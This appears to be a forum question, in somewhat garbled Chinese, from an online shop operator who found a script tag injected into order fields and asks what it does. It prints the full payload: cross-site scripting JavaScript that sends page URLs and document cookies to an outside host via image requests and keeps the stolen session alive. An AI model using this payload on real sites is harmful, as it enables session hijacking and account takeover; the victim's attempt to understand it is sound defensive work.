通过一个流行的平台操作网上商店,并通过嵌入以下几个字段的命令来完成订单:名称,地址等。我试图了解脚本完成的内容。我已经删除了在此页面上运行的任何方式,我希望:
[script src=//XX.YY/g][/script]
btw, XX=jb & YY=gy
==>>
(function(){(new Image()).src='http://XX.YY/index.php?do=api&id=g&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://XX.YY/index.php?do=keepsession&id=g&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
x=new Image();
x.src="http://XX.YY/authtest.php?id=g&info=cheeptrims.com";